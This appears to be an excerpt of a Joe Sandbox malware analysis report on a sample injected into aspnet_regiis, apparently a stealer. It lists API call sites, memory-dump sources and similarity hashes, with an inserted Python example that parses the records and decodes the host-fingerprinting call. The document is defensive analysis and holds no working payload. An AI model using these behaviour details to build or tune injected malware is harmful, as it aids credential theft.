                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Initialize
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2538663250-0
                                                                                                                                                                                                                                              • Opcode ID: 8e18e80e202ed01620de1325316161bd89d0f4138e16c5c4f5039a8e62b48535
                                                                                                                                                                                                                                              • Instruction ID: 9f3e702e6b9bb2da970e748bc6d3a6f89c45b712520b8e46a37b70a14896a07f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e18e80e202ed01620de1325316161bd89d0f4138e16c5c4f5039a8e62b48535
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A41C7B4910B40AFD370EF39DA0B7137EB8AB05250F508B1DF9E6866D4E235A4198BD7
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0072EC89
                                                                                                                                                                                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0072ECA2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeSecurity
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 640775948-0
                                                                                                                                                                                                                                              • Opcode ID: 0fa45b97284c351b8f3da443927dcae05ff1650f17fac1bf5e572d427dc1a2d0
                                                                                                                                                                                                                                              • Instruction ID: 31d9e94037d624247d3c91463fcbb457effc0b98ad05209988913f7ce305f2ec
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fa45b97284c351b8f3da443927dcae05ff1650f17fac1bf5e572d427dc1a2d0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5EE024743D9341BAF6B98714ED67F143226AB46F26F308304F72A7DBE58AE83201851D
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetUserDefaultUILanguage.KERNELBASE ref: 0075779D
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DefaultLanguageUser
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 95929093-0
                                                                                                                                                                                                                                              • Opcode ID: 064146c5b12ea53e323e42fd1c69a3bca6c122e26c53a4883e64df6a7a80c121
                                                                                                                                                                                                                                              • Instruction ID: 516b5261599080ef91dd38355418583852aad51b38fbb3a97913da791d3a5148
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 064146c5b12ea53e323e42fd1c69a3bca6c122e26c53a4883e64df6a7a80c121
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA31F532B466408FD719CA78DC877ADBBE28B95314F0E80A9D459C7392D93C8946CB20
APIs
• GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0074DD03
Memory Dump Source
• Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0
• Opcode ID: 844e4ee2c1cebddf3b64bfc166a1cbc32418a8f5b366de2336d88c77af214129
• Instruction ID: 95e2a4bdac6c2bf4273b86e25d24c59e028e53cbbb088e9ea5dec5ffc8316dff
• Opcode Fuzzy Hash: 844e4ee2c1cebddf3b64bfc166a1cbc32418a8f5b366de2336d88c77af214129
• Instruction Fuzzy Hash: 3D2192706047918FD7368F24C4A0722BBE1BF5B304B18968DD4D38B686CB78A845D762
APIs
• GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0074DD03
Memory Dump Source
• Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0
• Opcode ID: c971f70d50a72bb8878e37de8d760980d13a3e40acb5dc099fbd88e40543ec23
• Instruction ID: 074672eefc2018d896878be0b8857c50ab5d7314797b3cd25d42dc320cdaeef0
• Opcode Fuzzy Hash: c971f70d50a72bb8878e37de8d760980d13a3e40acb5dc099fbd88e40543ec23
• Instruction Fuzzy Hash: C411C4B06047918FD7258F24C8A0722BBA2BF4A300B1CC69DD493CB382CB78D841D761
APIs
• RtlReAllocateHeap.NTDLL(?,00000000), ref: 0075E0E0
Memory Dump Source
• Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: c5e69d2717bf3a6c40c624759394bc02e969ea4bd00864118afa48317c0ba153
• Instruction ID: 39866f9532d12aea160756a353dd5d283dc55f689d26ab258707d52a727fb1a1
• Opcode Fuzzy Hash: c5e69d2717bf3a6c40c624759394bc02e969ea4bd00864118afa48317c0ba153
• Instruction Fuzzy Hash: 1FF0A731814312FBC2112F247D05A9736A8EFC2711F154435F81597151EBBCE81AC595
APIs
• GetForegroundWindow.USER32 ref: 0075E3BA
Memory Dump Source
• Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
Similarity
• API ID: ForegroundWindow
• String ID:
• API String ID: 2020703349-0
• Opcode ID: 01c482c241b7cdd7a95c6bd86a7a6964ad074306b69560ae2f3bd47159f8cc3e
• Instruction ID: c132d87eb843269fefe6e23a3adb1e1a87a35af0a1f0c7cf9109eb1cf0831ac1
• Opcode Fuzzy Hash: 01c482c241b7cdd7a95c6bd86a7a6964ad074306b69560ae2f3bd47159f8cc3e
• Instruction Fuzzy Hash: 96F0A0FEE802128FDB04CF55EC5446533A7B7D831631DC469D906E3225DFB8A902CA45
APIs
Memory Dump Source
• Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
Similarity
• API ID: BlanketProxy
• String ID:
• API String ID: 3890896728-0
• Opcode ID: 69ce51d5c8a9048290e3aebfbd145426df6b65b725838c4c4bd45af6b4686503
• Instruction ID: e1b513b3575283d5579bc9a341b46a44cdfadf2bf656882281efd1f04feee4d0
• Opcode Fuzzy Hash: 69ce51d5c8a9048290e3aebfbd145426df6b65b725838c4c4bd45af6b4686503
• Instruction Fuzzy Hash: 83F0D0B4109701CFD344DF24D1A471A7BF0FB88304F10884CE4968B390CBB59A48CF82
APIs
Memory Dump Source
• Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
Similarity
• API ID: BlanketProxy
• String ID:
• API String ID: 3890896728-0
• Opcode ID: f51346924ac60e10f50912aab23df92b5d0204b9e5b5e7bd0d306c73ec0eb300
• Instruction ID: 5e69d0311e21463659b75ea954a2eb6defac423df520df51ba28c35b5e0ff2c7
• Opcode Fuzzy Hash: f51346924ac60e10f50912aab23df92b5d0204b9e5b5e7bd0d306c73ec0eb300
• Instruction Fuzzy Hash: 94F07AB46083418FD354DF24C5A871BBBE1BB84308F00891DE5998B390C7B99549CF82
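The function records above (the two GetComputerNameExA functions, the RtlReAllocateHeap and GetForegroundWindow callers, and the two BlanketProxy entries that carry no resolved API reference at all) share one fixed layout: an "APIs" list of call sites with their virtual addresses, the memory dump the function was lifted from with its image base under "Offset:", and the similarity hashes. The Python below is an added example, not code from Joe Sandbox or from the sample under analysis: it parses that layout, turns each "ref:" address into an RVA relative to the dump base (0x00720000 here, the injected image the "based on PE: true" line refers to), decodes the first argument of GetComputerNameExA with the COMPUTER_NAME_FORMAT enum from winbase.h, and lists the records for which no API reference was emitted. The embedded SAMPLE is three records copied from this section with the "Associated" lines dropped; the function and field names are this example's own.

```python
"""Added example (not Joe Sandbox code): parse the per-function records shown in this section,
compute each call's RVA inside the dumped image, and decode GetComputerNameExA's NameType."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# "• GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0074DD03"  or, with no
# argument list, "• GetForegroundWindow.USER32 ref: 0075E3BA"
API_RE = re.compile(r"^[•*-]?\s*(?P<api>\w+)\.(?P<module>\w+)"
                    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^[•*-]?\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
OFFSET_RE = re.compile(r"Offset:\s*(?P<off>[0-9A-Fa-f]+)")
HEADINGS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# COMPUTER_NAME_FORMAT (winbase.h): the first argument of GetComputerNameExA.
COMPUTER_NAME_FORMAT = {
    0: "ComputerNameNetBIOS", 1: "ComputerNameDnsHostname", 2: "ComputerNameDnsDomain",
    3: "ComputerNameDnsFullyQualified", 4: "ComputerNamePhysicalNetBIOS",
    5: "ComputerNamePhysicalDnsHostname", 6: "ComputerNamePhysicalDnsDomain",
    7: "ComputerNamePhysicalDnsFullyQualified"}

@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: int                # virtual address of the call site in the dump
    rva: int | None = None  # ref minus the dump's image base, once known

@dataclass
class FunctionRecord:
    api_id: str = ""
    dump_base: int | None = None
    calls: list[ApiCall] = field(default_factory=list)

def parse_records(text: str) -> list[FunctionRecord]:
    """Start a new record at every 'APIs' heading; API lines precede 'Source File'."""
    records: list[FunctionRecord] = []
    cur: FunctionRecord | None = None
    in_api_list = False
    for raw in text.splitlines():
        line = raw.strip().replace("Download File", "")  # drop link residue
        if not line:
            continue
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            in_api_list = True
            continue
        if cur is None or line in HEADINGS:
            in_api_list = False
            continue
        if in_api_list and (m := API_RE.match(line)):
            args = [a for a in (m["args"] or "").split(",") if a]
            cur.calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16)))
            continue
        if not (m := KV_RE.match(line)):
            continue
        key, val = m["key"].strip(), m["val"].strip()
        if key == "Source File" and (om := OFFSET_RE.search(val)):
            cur.dump_base = int(om["off"], 16)
            for c in cur.calls:
                c.rva = c.ref - cur.dump_base
        elif key == "API ID":
            cur.api_id = val
    return records

def describe_call(c: ApiCall) -> str:
    """Render a call with its RVA and, for GetComputerNameExA, the decoded NameType."""
    note = ""
    if c.api == "GetComputerNameExA" and c.args and re.fullmatch(r"[0-9A-Fa-f]+", c.args[0]):
        note = " NameType=" + COMPUTER_NAME_FORMAT.get(int(c.args[0], 16), "unknown")
    rva = f"rva=0x{c.rva:X}" if c.rva is not None else "rva=?"
    return f"{c.module}!{c.api} @ 0x{c.ref:08X} ({rva}){note}"

def records_without_api_refs(records: list[FunctionRecord]) -> list[str]:
    """API IDs of records tagged only by similarity, with no resolved API reference."""
    return [r.api_id for r in records if not r.calls]

# Constructed sample: three records copied from this section ('Associated' lines omitted).
SAMPLE = """\
APIs
• GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0074DD03
Memory Dump Source
• Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
Similarity
• API ID: ComputerName
APIs
• GetForegroundWindow.USER32 ref: 0075E3BA
Memory Dump Source
• Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
Similarity
• API ID: ForegroundWindow
APIs
Memory Dump Source
• Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
Similarity
• API ID: BlanketProxy
"""
```

Running parse_records(SAMPLE) and describe_call on the first record gives "KERNELBASE!GetComputerNameExA @ 0x0074DD03 (rva=0x2DD03) NameType=ComputerNamePhysicalDnsHostname": NameType 5 is the physical DNS hostname, i.e. the stealer's host fingerprint. The RVA, not the absolute "ref:" address, is what to carry over to a static disassembly of the dumped PE, since the injected image may land at a different base on another run. The BlanketProxy records come back with an empty call list, which is how the report shows them: tagged by similarity hash only, with no API reference resolved.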
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,00000000,?,0075E0F9), ref: 0075C590
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                                                                                              • Opcode ID: 3c04567bd0cf67e4d7749d0d10093b4eb0c32bebe01c52ddc0d032aa0919d6f2
                                                                                                                                                                                                                                              • Instruction ID: e1d7300dddcbe3817bc64cfe83a5b472ce7746454fc69740a432f6e034ca7d65
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c04567bd0cf67e4d7749d0d10093b4eb0c32bebe01c52ddc0d032aa0919d6f2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16D0C931419622EBC6102F28BC05BC73A589F49261F074891F514AA075C768EC91CAD4
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,00000000), ref: 0075C561
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                              • Opcode ID: 07d305e164c468bae7233e61bc0fa627ed2f31fcb98255365c183bb90e10b0b6
                                                                                                                                                                                                                                              • Instruction ID: a61c0fe4462f4c3f3130554de00ab9e53d8cad2078091387f7b1ae4b30738dfe
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 07d305e164c468bae7233e61bc0fa627ed2f31fcb98255365c183bb90e10b0b6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35A01130080020AACA222B20BC08FC23E20EB082A0F028082F008880B282208882CA88
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: "nl$#M%O$*"$4UW$\701$\701$a`|v$wt$AC$MO$pv$uvw
                                                                                                                                                                                                                                              • API String ID: 0-635595044
                                                                                                                                                                                                                                              • Opcode ID: 8d0eada960b9db452e1f7c613afe6bb361832d3c66aa10a4c7bc8ef8d49488e3
                                                                                                                                                                                                                                              • Instruction ID: cfb1669cf9fe6350db283f9f18fb04f36beec9cb7fa2ae67b35f9cdb020ad4c6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d0eada960b9db452e1f7c613afe6bb361832d3c66aa10a4c7bc8ef8d49488e3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B02E1B660C3108BD7049F68D89166BBBF1EFD1314F198D2CF4C59B352D2389A09CB96
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 007484BD
                                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 007485B4
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                              • String ID: LF7Y$_^]\
                                                                                                                                                                                                                                              • API String ID: 237503144-3688711800
                                                                                                                                                                                                                                              • Opcode ID: c004d96c4db9a570eea45fbe0ab0a058a62d31ea0a4cacf2709fdcbc8f1b0cd8
                                                                                                                                                                                                                                              • Instruction ID: 50bab94249a2c7deba0492f9d84e208e140d78f843599886f2932b35d39519ad
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c004d96c4db9a570eea45fbe0ab0a058a62d31ea0a4cacf2709fdcbc8f1b0cd8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A22017190C341CFD3288F28D89072FBBE1BF89314F198A6CE996573A1D7799901CB96
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?), ref: 007491DA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                              • String ID: +Ku$wpq
                                                                                                                                                                                                                                              • API String ID: 237503144-1953850642
                                                                                                                                                                                                                                              • Opcode ID: c5b79acac20e03018182141dd697ab7eb35b0c1a1d9bd173a5fc300b31f22832
                                                                                                                                                                                                                                              • Instruction ID: 3a6ad0a8d4c42a4e3c0dfee4010065fa74ef4bcf7f0afeb1f26e68f0bba72e29
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5b79acac20e03018182141dd697ab7eb35b0c1a1d9bd173a5fc300b31f22832
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9551CD7221C3568FC324CF29984076FB7E2EBC5310F55892DE5AACB285DB74D50ACB92
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: MetricsSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4116985748-3916222277
APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00749170
Strings
Memory Dump Source
• Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
Similarity
• API ID: EnvironmentExpandStrings
• String ID: M/($M/(
• API String ID: 237503144-1710806632
Strings
Similarity
• API ID:
• String ID: C@$_^]\
• API String ID: 0-1259475386
Strings
Similarity
• API ID:
• String ID: EWC`
• API String ID: 0-1922773688
APIs
• FreeLibrary.KERNEL32(1A11171A), ref: 0074D2A4
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
Strings
Similarity
• API ID:
• String ID: "
• API String ID: 0-123907689
Strings
Similarity
• API ID:
• String ID: N&
• API String ID: 0-3274356042
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
